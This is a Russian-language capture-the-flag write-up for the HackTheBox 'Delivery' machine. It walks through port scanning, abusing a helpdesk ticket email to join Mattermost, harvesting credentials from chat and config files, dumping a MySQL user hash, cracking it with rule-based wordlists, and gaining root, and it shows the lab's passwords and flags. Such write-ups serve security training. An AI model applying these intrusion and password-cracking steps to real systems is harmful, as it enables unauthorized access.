Обзор сервисов
Машине выдали IP-адрес 10.10.10.222. Выполним стандартное сканирование портов с помощью nmap:
$ nmap -sV -sC -Pn -p1-65535 -oN 10.10.10.222 10.10.10.222
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-06 13:44 EDT
Nmap scan report for 10.10.10.222
Host is up (0.15s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
| 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_ 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
8065/tcp open unknown
| fingerprint-strings:
| GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Accept-Ranges: bytes
| Cache-Control: no-cache, max-age=31556926, public
| Content-Length: 3108
| Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
| Content-Type: text/html; charset=utf-8
| Last-Modified: Fri, 04 Aug 2023 06:18:32 GMT
| X-Frame-Options: SAMEORIGIN
| X-Request-Id: js9uqnkx6bn1uyammdceck5q8r
| X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
| Date: Sun, 06 Aug 2023 17:50:12 GMT
| <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Date: Sun, 06 Aug 2023 17:50:12 GMT
|_ Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8065-TCP:V=7.94%I=7%D=8/6%Time=64CFDD52%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
SF:0Request")%r(GetRequest,DF3,"HTTP/1\.0\x20200\x20OK\r\nAccept-Ranges:\x
SF:20bytes\r\nCache-Control:\x20no-cache,\x20max-age=31556926,\x20public\r
SF:\nContent-Length:\x203108\r\nContent-Security-Policy:\x20frame-ancestor
SF:s\x20'self';\x20script-src\x20'self'\x20cdn\.rudderlabs\.com\r\nContent
SF:-Type:\x20text/html;\x20charset=utf-8\r\nLast-Modified:\x20Fri,\x2004\x
SF:20Aug\x202023\x2006:18:32\x20GMT\r\nX-Frame-Options:\x20SAMEORIGIN\r\nX
SF:-Request-Id:\x20js9uqnkx6bn1uyammdceck5q8r\r\nX-Version-Id:\x205\.30\.0
SF:\.5\.30\.1\.57fb31b889bf81d99d8af8176d4bbaaa\.false\r\nDate:\x20Sun,\x2
SF:006\x20Aug\x202023\x2017:50:12\x20GMT\r\n\r\n<!doctype\x20html><html\x2
SF:0lang=\"en\"><head><meta\x20charset=\"utf-8\"><meta\x20name=\"viewport\
SF:"\x20content=\"width=device-width,initial-scale=1,maximum-scale=1,user-
SF:scalable=0\"><meta\x20name=\"robots\"\x20content=\"noindex,\x20nofollow
SF:\"><meta\x20name=\"referrer\"\x20content=\"no-referrer\"><title>Matterm
SF:ost</title><meta\x20name=\"mobile-web-app-capable\"\x20content=\"yes\">
SF:<meta\x20name=\"application-name\"\x20content=\"Mattermost\"><meta\x20n
SF:ame=\"format-detection\"\x20content=\"telephone=no\"><link\x20re")%r(HT
SF:TPOptions,5B,"HTTP/1\.0\x20405\x20Method\x20Not\x20Allowed\r\nDate:\x20
SF:Sun,\x2006\x20Aug\x202023\x2017:50:12\x20GMT\r\nContent-Length:\x200\r\
SF:n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent
SF:-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n4
SF:00\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\
SF:nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\
SF:r\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20
SF:Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConn
SF:ection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,
SF:67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\
SF:x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 454.39 seconds
Сканирование портов показало стандартные порты для Linux-машин HackTheBox, однако в дополнение к ним нашелся порт 8065.
Веб-интерфейс
Нас встречает Helpdesk. В ссылках фигурируют домены delivery.htb, helpdesk.delivery.htb.
Добавим в /etc/hosts эти домены и проверим заново.
$ sudo nano /etc/hosts
10.10.10.222 delivery.htb helpdesk.delivery.htb
Видим систему заявок в helpdesk.
Попытаемся узнать версию:
$ git clone https://github.com/Legoclones/pentesting-osTicket
$ cd pentesting-osTicket
$ python3 ostVersionScanner.py http://helpdesk.delivery.htb
[-] /setup/ directory not found, checking CSS and JS files…
[+] Version(s): 1.15.1 or 1.14.5
Беглый поиск не показал готовых эксплоитов.
Посмотрим на порт 8065:
Перед нами сервер mattermost. Попробуем зарегистрироваться. Но в конце регистрации требуется подтверждение по ссылке в email.
Попробуем создать заявку на helpdesk.
В конце нам предлагается обновить статус заявки с помощью email [email protected]. Попробуем зарегистрироваться в mattermost с помощью этого email.
Мы получили ссылку на подтверждение создания аккаунта. Пройдем по ней.
После логина в mattermost нас приглашают в команду internal.
Из канала в mattermost получаем креды для логина как maildeliverer:Youve_G0t_Mail!.
SSH
$ ssh [email protected]
Youve_G0t_Mail!
Пользовательский флаг
maildeliverer@Delivery:~$ ls
'!' 1 select user.txt
maildeliverer@Delivery:~$ cat user.txt
e44907cf32803bbddca6ab1c2cd94466
Повышение привилегий
Конфигурация и дистрибутив mattermost лежат в /opt.
maildeliverer@Delivery:~$ ls /opt
mattermost
maildeliverer@Delivery:~$ ls /opt/mattermost/
bin config ENTERPRISE-EDITION-LICENSE.txt i18n manifest.txt plugins README.md
client data fonts logs NOTICE.txt prepackaged_plugins templates
maildeliverer@Delivery:~$ ls /opt/mattermost/config/
cloud_defaults.json config.json README.md
$ cat config.json
...
"DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
...
Посмотрим, что лежит в базе MySQL:
$ mysql -u mmuser -pCrack_The_MM_Admin_PW -e "show tables;" mattermost
+------------------------+
| Tables_in_mattermost |
+------------------------+
| Audits |
| Bots |
| ChannelMemberHistory |
| ChannelMembers |
| Channels |
| ClusterDiscovery |
| CommandWebhooks |
| Commands |
| Compliances |
| Emoji |
| FileInfo |
| GroupChannels |
| GroupMembers |
| GroupTeams |
| IncomingWebhooks |
| Jobs |
| Licenses |
| LinkMetadata |
| OAuthAccessData |
| OAuthApps |
| OAuthAuthData |
| OutgoingWebhooks |
| PluginKeyValueStore |
| Posts |
| Preferences |
| ProductNoticeViewState |
| PublicChannels |
| Reactions |
| Roles |
| Schemes |
| Sessions |
| SidebarCategories |
| SidebarChannels |
| Status |
| Systems |
| TeamMembers |
| Teams |
| TermsOfService |
| ThreadMemberships |
| Threads |
| Tokens |
| UploadSessions |
| UserAccessTokens |
| UserGroups |
| UserTermsOfService |
| Users |
+------------------------+
$ mysql -u mmuser -pCrack_The_MM_Admin_PW -e "select * from Users where Roles != 'system_user';" mattermost
+----------------------------+---------------+---------------+----------+----------+--------------------------------------------------------------+----------+-------------+-------------------+---------------+----------+-----------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+------------------------------------------------------------------------------------------+-----------+-----------+
| Id | CreateAt | UpdateAt | DeleteAt | Username | Password | AuthData | AuthService | Email | EmailVerified | Nickname | FirstName | LastName | Position | Roles | AllowMarketing | Props | NotifyProps | LastPasswordUpdate | LastPictureUpdate | FailedAttempts | Locale | Timezone | MfaActive | MfaSecret |
+----------------------------+---------------+---------------+----------+----------+--------------------------------------------------------------+----------+-------------+-------------------+---------------+----------+-----------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+------------------------------------------------------------------------------------------+-----------+-----------+
| dijg7mcf4tf3xrgxi5ntqdefma | 1608992692294 | 1609157893370 | 0 | root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0OSTWb4.4ScG.anuu7v0EFJwgjjO | NULL | | [email protected] | 1 | | | | | system_admin system_user | 1 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609157893370 | 0 | 2 | en | {"automaticTimezone":"Africa/Abidjan","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
+----------------------------+---------------+---------------+----------+----------+--------------------------------------------------------------+----------+-------------+-------------------+---------------+----------+-----------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+------------------------------------------------------------------------------------------+-----------+-----------+
В посте в mattermost указано, что пароль может быть связан с PleaseSubscribe!:
Also please create a program to help us stop re-using the same passwords everywhere…. Especially those that are a variant of “PleaseSubscribe!”
Запишем хеш в hash, а пароль в password.
$ cat hash.txt
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0OSTWb4.4ScG.anuu7v0EFJwgjjO
$ cat password
PleaseSubscribe!
Создадим словарь и запустим брутфорс:
$ hashcat -r /usr/share/hashcat/rules/best64.rule --stdout password > d.txt
$ john --wordlist=d.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
PleaseSubscribe!21 (?)
1g 0:00:00:00 DONE (2023-08-06 14:58) 1.666g/s 120.0p/s 120.0c/s 120.0C/s PleaseSubscribe!..PlesPles
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Нужные креды root:PleaseSubscribe!21. Поднимем привилегии с помощью su:
$ su
PleaseSubscribe!21
root@Delivery:/home/maildeliverer# id
uid=0(root) gid=0(root) groups=0(root)
Флаг суперпользователя
root@Delivery:/home/maildeliverer# cd /root/
root@Delivery:~# ls
mail.sh note.txt py-smtp.py root.txt
root@Delivery:~# cat root.txt
e93ab70eba42196b77eefbce6e40a593
